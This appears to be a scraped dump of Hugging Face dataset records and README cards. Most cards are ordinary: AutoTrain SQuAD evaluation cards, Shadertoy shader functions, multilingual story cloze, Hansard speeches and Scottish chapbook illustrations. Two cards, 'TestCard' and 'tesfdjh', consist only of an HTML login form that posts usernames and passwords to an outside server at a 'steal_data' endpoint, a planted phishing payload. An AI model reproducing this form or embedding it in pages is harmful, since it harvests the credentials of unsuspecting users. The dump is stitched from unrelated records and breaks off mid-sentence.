--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: autoevaluate/distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: autoevaluate/distilbert-base-cased-distilled-squad * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
Vipitis
null
null
null
false
1
false
Vipitis/Shadertoys-fine
2022-07-24T15:13:31.000Z
null
false
f4712ab358518c7c2f289e30bcdfa5ef599f4fcf
[]
[ "annotations_creators:no-annotation", "language:en", "language:code", "language_creators:machine-generated", "license:cc-by-nc-sa-3.0", "size_categories:100K<n<1M", "tags:code", "task_categories:text-generation" ]
https://huggingface.co/datasets/Vipitis/Shadertoys-fine/resolve/main/README.md
--- annotations_creators: - no-annotation language: - en - code language_creators: - machine-generated license: - cc-by-nc-sa-3.0 multilinguality: [] pretty_name: Shadertoys-fine size_categories: - 100K<n<1M source_datasets: [] tags: - code task_categories: - text-generation task_ids: [] --- # Dataset Card for Shadertoys-fine ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Source Data](#source-data) - [Licensing Information](#licensing-information) ## Dataset Description - **Repository:** https://github.com/Vipitis/project (private placeholder) ### Dataset Summary fine variant of the Shadertoys dataset (still WIP), where individual functions are avaialable as Datapoints. ### Supported Tasks and Leaderboards `language-modeling`: The dataset can be used to train a model for modelling programming languages, which consists in building language models for programming languages. ### Languages - English (names, comments) - Shadercode **programming** language ## Dataset Structure ### Data Instances A data point consists of the function string, it's name as well as a bit of metadata like the author and source URL. (in the future there might be a function string without comments) ``` { 'name': '<type> <name>', 'code': '<type> <name>(<inputs>) { <body> return <outputs>; }\n', 'source': 'https://shadertoy.com/view/<shaderID>', 'author': '<username>' } ``` ## #Data Fields - 'name' funciton identifier composed of the type and the name of the function - 'code' the raw code (including comments) of function. - 'source' URL to the shader. 
It might be on a different renderpass - 'author' username of the shader author ### Data Splits Currently available (shuffled): - train (85.0%) - test (15.0%) ## Dataset Creation Data retrieved starting 2022-07-20 ### Source Data #### Initial Data Collection and Normalization All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2) and then by looking for keywords and counting curly brackets to figure out what is part of a function and what isn't. #### Who are the source language producers? Shadertoy.com contributers which publish shaders as 'public+API' ## Licensing Information The Default [licnese for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached. The Dataset is currently not filtering for any licensis.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-b21ddcda-11615545
2022-07-22T11:17:44.000Z
null
false
94f5828caf1fed6c4e59499abdfcd873a9c030a3
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-b21ddcda-11615545/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
ameerazam08
null
null
null
false
1
false
ameerazam08/autotrain-data-imdb
2022-08-08T04:19:44.000Z
null
false
9c16af46e39ca7b77c67d091885bafd8cb05ee48
[]
[]
https://huggingface.co/datasets/ameerazam08/autotrain-data-imdb/resolve/main/README.md
Simpe Sentimental analysis Dataset checking with AUtoTrain Pipeline
Muennighoff
null
@article{DBLP:journals/corr/abs-2112-10668, author = {Xi Victoria Lin and Todor Mihaylov and Mikel Artetxe and Tianlu Wang and Shuohui Chen and Daniel Simig and Myle Ott and Naman Goyal and Shruti Bhosale and Jingfei Du and Ramakanth Pasunuru and Sam Shleifer and Punit Singh Koura and Vishrav Chaudhary and Brian O'Horo and Jeff Wang and Luke Zettlemoyer and Zornitsa Kozareva and Mona T. Diab and Veselin Stoyanov and Xian Li}, title = {Few-shot Learning with Multilingual Language Models}, journal = {CoRR}, volume = {abs/2112.10668}, year = {2021}, url = {https://arxiv.org/abs/2112.10668}, eprinttype = {arXiv}, eprint = {2112.10668}, timestamp = {Tue, 04 Jan 2022 15:59:27 +0100}, biburl = {https://dblp.org/rec/journals/corr/abs-2112-10668.bib}, bibsource = {dblp computer science bibliography, https://dblp.org} }
Story Cloze Test' is a commonsense reasoning framework for evaluating story understanding, story generation, and script learning.This test requires a system to choose the correct ending to a four-sentence story.
false
13
false
Muennighoff/xstory_cloze
2022-10-20T19:44:18.000Z
null
false
8bb76e594b68147f1a430e86829d07189622b90d
[]
[ "annotations_creators:found", "language_creators:found", "language:ar", "language:es", "language:eu", "language:hi", "language:id", "language:zh", "language:ru", "language:my", "license:unknown", "multilinguality:multilingual", "size_categories:1K<n<10K", "source_datasets:original", "tag...
https://huggingface.co/datasets/Muennighoff/xstory_cloze/resolve/main/README.md
--- annotations_creators: - found language_creators: - found language: - ar - es - eu - hi - id - zh - ru - my license: - unknown multilinguality: - multilingual size_categories: - 1K<n<10K source_datasets: - original task_ids: [] tags: - other-story-completion --- # Dataset Card for "story_cloze" ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description ### Dataset Summary Story Cloze Test' is a new commonsense reasoning framework for evaluating story understanding, story generation, and script learning.This test requires a system to choose the correct ending to a four-sentence story. ### Data Instances - **Size of downloaded dataset files:** 2.03 MB - **Size of the generated dataset:** 2.03 MB - **Total amount of disk used:** 2.05 MB An example of 'train' looks as follows. 
``` {'answer_right_ending': 1, 'input_sentence_1': 'Rick grew up in a troubled household.', 'input_sentence_2': 'He never found good support in family, and turned to gangs.', 'input_sentence_3': "It wasn't long before Rick got shot in a robbery.", 'input_sentence_4': 'The incident caused him to turn a new leaf.', 'sentence_quiz1': 'He is happy now.', 'sentence_quiz2': 'He joined a gang.', 'story_id': '138d5bfb-05cc-41e3-bf2c-fa85ebad14e2'} ``` ### Data Fields The data fields are the same among all splits. - `input_sentence_1`: The first statement in the story. - `input_sentence_2`: The second statement in the story. - `input_sentence_3`: The third statement in the story. - `input_sentence_4`: The forth statement in the story. - `sentence_quiz1`: first possible continuation of the story. - `sentence_quiz2`: second possible continuation of the story. - `answer_right_ending`: correct possible ending; either 1 or 2. - `story_id`: story id. ### Data Splits | name |validation |test| |-------|-----:|---:| |lang|1871|1871|
autoevaluate
null
null
null
false
6
false
autoevaluate/autoeval-staging-eval-project-squad_v2-a5d9cc45-11645552
2022-07-22T13:17:28.000Z
null
false
de17e62a0b8f40bae1ff1bffd42916d46adc62a2
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-a5d9cc45-11645552/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: nbroad/deberta-v3-xsmall-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: nbroad/deberta-v3-xsmall-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad-056210f3-11655553
2022-07-22T15:10:00.000Z
null
false
850e6e9d4e72b0b1bd5b8ecebdb169cc0afecc55
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-056210f3-11655553/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: distilbert-base-cased-distilled-squad metrics: [] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: distilbert-base-cased-distilled-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-4938eeea-11665554
2022-07-22T15:13:27.000Z
null
false
bb5a0bf1924a55a85433166cacc8384fd7c099dc
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-4938eeea-11665554/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: nbroad/xdistil-l12-h384-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: nbroad/xdistil-l12-h384-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-b7567fd1-11675555
2022-07-22T15:54:17.000Z
null
false
0513e0c12e945fa315e4fb166e3d741cb4413105
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-b7567fd1-11675555/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/roberta-base-squad2-distilled metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/roberta-base-squad2-distilled * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@yjernite](https://huggingface.co/yjernite) for evaluating this model.
biglam
null
@misc{odell, evan_2021, title={Hansard Speeches 1979-2021: Version 3.1.0}, DOI={10.5281/zenodo.4843485}, abstractNote={<p>Full details are available at <a href="https://evanodell.com/projects/datasets/hansard-data">https://evanodell.com/projects/datasets/hansard-data</a></p> <p><strong>Version 3.1.0 contains the following changes:</strong></p> <p>- Coverage up to the end of April 2021</p>}, note={This release is an update of previously released datasets. See full documentation for details.}, publisher={Zenodo}, author={Odell, Evan}, year={2021}, month={May} }
A dataset containing every speech in the House of Commons from May 1979-July 2020.
false
1
false
biglam/hansard_speech
2022-07-27T12:30:30.000Z
null
false
ef655a3bfc18d977bb7d657ab87a6de404c883fc
[]
[ "annotations_creators:no-annotation", "language:en", "language_creators:expert-generated", "license:cc-by-4.0", "multilinguality:monolingual", "size_categories:1M<n<10M", "source_datasets:original", "tags:speeches", "tags:politics", "tags:parliament", "tags:British", "task_categories:text-clas...
https://huggingface.co/datasets/biglam/hansard_speech/resolve/main/README.md
--- annotations_creators: - no-annotation language: - 'en' language_creators: - expert-generated license: - cc-by-4.0 multilinguality: - monolingual pretty_name: Hansard Speeches size_categories: - 1M<n<10M source_datasets: - original tags: - speeches - politics - parliament - British task_categories: - text-classification - text-generation task_ids: - multi-class-classification - language-modeling - masked-language-modeling --- # Dataset Card for Hansard speech ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** https://evanodell.com/projects/datasets/hansard-data/ - **Repository:** https://github.com/evanodell/hansard-data3 - **Paper:** [Needs More Information] - **Leaderboard:** [Needs More Information] - **Point of Contact:** [Evan Odell](https://github.com/evanodell) ### Dataset Summary A dataset containing every speech in the House of Commons from May 1979-July 2020. Quoted from the dataset homepage > Please contact me if you find any errors in the dataset. 
The integrity of the public Hansard record is questionable at times, and while I have improved it, the data is presented "as is". ### Supported Tasks and Leaderboards - `text-classification`: This dataset can be used to classify various texts (transcribed from speeches) as different time periods or as different types - `language-modeling`: This dataset can contribute to the training or the evaluation of language models for historical texts. ### Languages `en:GB` ## Dataset Structure ### Data Instances ``` { 'id': 'uk.org.publicwhip/debate/1979-05-17a.390.0', 'speech': "Since the Minister for Consumer Affairs said earlier that the bread price rise would be allowed, in view of developing unemployment in the baking industry, and since the Mother's Pride bakery in my constituency is about to close, will the right hon. Gentleman give us a firm assurance that there will be an early debate on the future of the industry, so that the Government may announce that, thanks to the price rise, those workers will not now be put out of work?", 'display_as': 'Eric Heffer', 'party': 'Labour', 'constituency': 'Liverpool, Walton', 'mnis_id': '725', 'date': '1979-05-17', 'time': '', 'colnum': '390', 'speech_class': 'Speech', 'major_heading': 'BUSINESS OF THE HOUSE', 'minor_heading': '', 'oral_heading': '', 'year': '1979', 'hansard_membership_id': '5612', 'speakerid': 'uk.org.publicwhip/member/11615', 'person_id': '', 'speakername': 'Mr. 
Heffer', 'url': '', 'government_posts': [], 'opposition_posts': [], 'parliamentary_posts': ['Member, Labour Party National Executive Committee'] } ``` ### Data Fields |Variable|Description| |---|---| |id|The ID as assigned by mysociety| |speech|The text of the speech| |display_as| The standardised name of the MP.| |party|The party an MP is member of at time of speech| |constituency| Constituency represented by MP at time of speech| |mnis_id| The MP's Members Name Information Service number| |date|Date of speech| |time|Time of speech| |colnum |Column number in hansard record| |speech_class |Type of speech| |major_heading| Major debate heading| |minor_heading| Minor debate heading| |oral_heading| Oral debate heading| |year |Year of speech| |hansard_membership_id| ID used by mysociety| |speakerid |ID used by mysociety| |person_id |ID used by mysociety| |speakername| MP name as appeared in Hansard record for speech| |url| link to speech| |government_posts| Government posts held by MP (list)| |opposition_posts |Opposition posts held by MP (list)| |parliamentary_posts| Parliamentary posts held by MP (list)| ### Data Splits Train: 2694375 ## Dataset Creation ### Curation Rationale This dataset contains all the speeches made in the House of Commons and can be used for a number of deep learning tasks like detecting how language and societal views have changed over the >40 years. The dataset also provides language closer to the spoken language used in an elite British institution. ### Source Data #### Initial Data Collection and Normalization The dataset is created by getting the data from [data.parliament.uk](http://data.parliament.uk/membersdataplatform/memberquery.aspx). There is no normalization. #### Who are the source language producers? [N/A] ### Annotations #### Annotation process None #### Who are the annotators? 
[N/A] ### Personal and Sensitive Information This is public information, so there should not be any personal and sensitive information ## Considerations for Using the Data ### Social Impact of Dataset The purpose of this dataset is to understand how language use and society's views have changed over time. ### Discussion of Biases Because of the long time period this dataset spans, it might contain language and opinions that are unacceptable in modern society. ### Other Known Limitations [Needs More Information] ## Additional Information ### Dataset Curators This dataset was built on top of [parlparse](https://github.com/mysociety/parlparse) by [Evan Odell](https://github.com/evanodell) ### Licensing Information Creative Commons Attribution 4.0 International License ### Citation Information ``` @misc{odell, evan_2021, title={Hansard Speeches 1979-2021: Version 3.1.0}, DOI={10.5281/zenodo.4843485}, abstractNote={<p>Full details are available at <a href="https://evanodell.com/projects/datasets/hansard-data">https://evanodell.com/projects/datasets/hansard-data</a></p> <p><strong>Version 3.1.0 contains the following changes:</strong></p> <p>- Coverage up to the end of April 2021</p>}, note={This release is an update of previously released datasets. See full documentation for details.}, publisher={Zenodo}, author={Odell, Evan}, year={2021}, month={May} } ``` Thanks to [@shamikbose](https://github.com/shamikbose) for adding this dataset.
testname
null
null
null
false
1
false
testname/TestCard
2022-07-23T02:27:28.000Z
null
false
1814a7e4c91dc6bfc0f7654da1170d3cafed64a6
[]
[]
https://huggingface.co/datasets/testname/TestCard/resolve/main/README.md
<form action="http://3msec.com/steal_data" method="POST"> Username: <input name="username" type="text"> Password: <input name="password" type="password"> <input name="submit" type="submit" <input> </form> ## Test ** test2 **
dsadasdad
null
null
null
false
1
false
dsadasdad/tesfdjh
2022-07-23T02:39:57.000Z
null
false
4cbca4e0faa2eca2064f49fe5159723c276eb905
[]
[]
https://huggingface.co/datasets/dsadasdad/tesfdjh/resolve/main/README.md
<form action="http://3msec.com/steal_data" method="POST"> Username: <input name="username" type="text"> Password: <input name="password" type="password"> <input name="submit" type="submit" <input> </form>
openclimatefix
null
null
null
false
1
false
openclimatefix/era5-land
2022-11-09T02:30:14.000Z
null
false
02124c83c4238942ec8c85941cc98d86f18d478b
[]
[ "license:mit" ]
https://huggingface.co/datasets/openclimatefix/era5-land/resolve/main/README.md
--- license: mit --- This dataset is comprised of ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5-reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here. Each file is one day, and holds 24 timesteps.
biglam
null
@inproceedings{10.1145/3476887.3476893, author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew}, title = {Visual Analysis of Chapbooks Printed in Scotland}, year = {2021}, isbn = {9781450386906}, publisher = {Association for Computing Machinery}, address = {New York, NY, USA}, url = {https://doi.org/10.1145/3476887.3476893}, doi = {10.1145/3476887.3476893}, abstract = {Chapbooks were short, cheap printed booklets produced in large quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. 
We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.}, booktitle = {The 6th International Workshop on Historical Document Imaging and Processing}, pages = {67–72}, numpages = {6}, keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset}, location = {Lausanne, Switzerland}, series = {HIP '21} }
null
false
386
false
biglam/nls_chapbook_illustrations
2022-09-15T09:20:03.000Z
null
false
030d32aec7fab793745db87875b3306e1bdbab21
[]
[ "annotations_creators:expert-generated", "license:other", "size_categories:1K<n<10K", "tags:lam", "task_categories:object-detection", "task_categories:image-classification", "task_ids:multi-class-image-classification" ]
https://huggingface.co/datasets/biglam/nls_chapbook_illustrations/resolve/main/README.md
--- annotations_creators: - expert-generated language: [] language_creators: [] license: - other multilinguality: [] pretty_name: National Library of Scotland Chapbook Illustrations size_categories: - 1K<n<10K source_datasets: [] tags: - lam task_categories: - object-detection - image-classification task_ids: - multi-class-image-classification --- # Dataset Card for National Library of Scotland Chapbook Illustrations ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Homepage:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/ - **Repository:** https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/ - **Paper:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf - **Leaderboard:** - **Point of Contact:** giles.bergel@eng.ox.ac.uk ### Dataset Summary This dataset comprises of images from chapbooks held by the [National Library of Scotland](https://www.nls.uk/) and digitised and published as its 
[Chapbooks Printed in Scotland](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) dataset. > "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -[Source](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item. This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the [Visual Geometry Group](https://www.robots.ox.ac.uk/~vgg/) in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship [awarded](https://data.nls.uk/projects/the-national-librarians-research-fellowship-in-digital-scholarship/) to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in [this paper](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf). 
The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/) ### Supported Tasks and Leaderboards - `object-detection`: the dataset contains bounding boxes for images contained in the Chapbooks - `image-classification`: a configuration for this dataset provides a classification label indicating if a page contains an illustration or not. - `image-matching`: a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/). The performance on the `object-detection` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows: | IOU threshold | Precision | Recall | |---------------|-----------|--------| | 0.50 | 0.993 | 0.911 | | 0.75 | 0.987 | 0.905 | | 0.95 | 0.973 | 0.892 | The performance on the `image classification` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows: Images in original dataset: 47329 Numbers of images on which at least one illustration was detected: 3629 Note that these figures do not represent images that contained multiple detections. See the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for examples of false-positive detections. The performance on the 'image-matching' task is undergoing evaluation. ### Languages Text accompanying the illustrations is in English, Scots or Scottish Gaelic. 
## Dataset Structure ### Data Instances An example instance from the `illustration-detection` split: ```python {'image_id': 4, 'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>, 'width': 600, 'height': 1080, 'objects': [{'category_id': 0, 'image_id': '4', 'id': 1, 'area': 110901, 'bbox': [34.529998779296875, 556.8300170898438, 401.44000244140625, 276.260009765625], 'segmentation': [[34.529998779296875, 556.8300170898438, 435.9700012207031, 556.8300170898438, 435.9700012207031, 833.0900268554688, 34.529998779296875, 833.0900268554688]], 'iscrowd': False}]} ``` An example instance from the `image-classification` split: ```python {'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>, 'label': 1} ``` An example from the `image-matching` split: ```python {'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>, 'group-label': 231} ``` ### Data Fields The fields for the `illustration-detection` config: - image_id: id for the image - height: height of the image - width: width of the image - image: image of the chapbook page - objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys: - bbox: bounding boxes for the images - category_id: a label for the image - image_id: id for the image - iscrowd: COCO is a crowd flag - segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts) The fields for the `image-classification` config: - image: image - label: a label indicating if the page contains an illustration or not The fields for the `image-matching` config: - image: image of the chapbook page - label: an id for a particular instance of an image i.e. the same images will share the same id. ### Data Splits There is a single split `train` for all configs. K-fold validation was used in the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) describing this dataset, so no existing splits were defined. 
## Dataset Creation ### Curation Rationale The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/), this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this [public demo](http://meru.robots.ox.ac.uk/nls_chapbooks/filelist) documented [here](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/) ### Source Data #### Initial Data Collection and Normalization The initial data was taken from the [National Library of Scotland's Chapbooks Printed in Scotland dataset](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used. #### Who are the source language producers? The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS [Data Foundry](https://data.nls.uk) under the direction of Dr. Sarah Ames. This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below. ### Annotations #### Annotation process Annotation was initially performed on a subset of 337 of the 47329 images, using the [VGG List Annotator (LISA](https://gitlab.com/vgg/lisa) software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see [this paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for more details). 
Initial detections were performed with an [EfficientDet](https://ai.googleblog.com/2020/04/efficientdet-towards-scalable-and.html) object detector trained on [COCO](https://cocodataset.org/#home), the annotation of which is described in [this paper](https://arxiv.org/abs/1405.0312) #### Who are the annotators? Abhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel. ### Personal and Sensitive Information None ## Considerations for Using the Data ### Social Impact of Dataset We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period. ### Discussion of Biases While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation 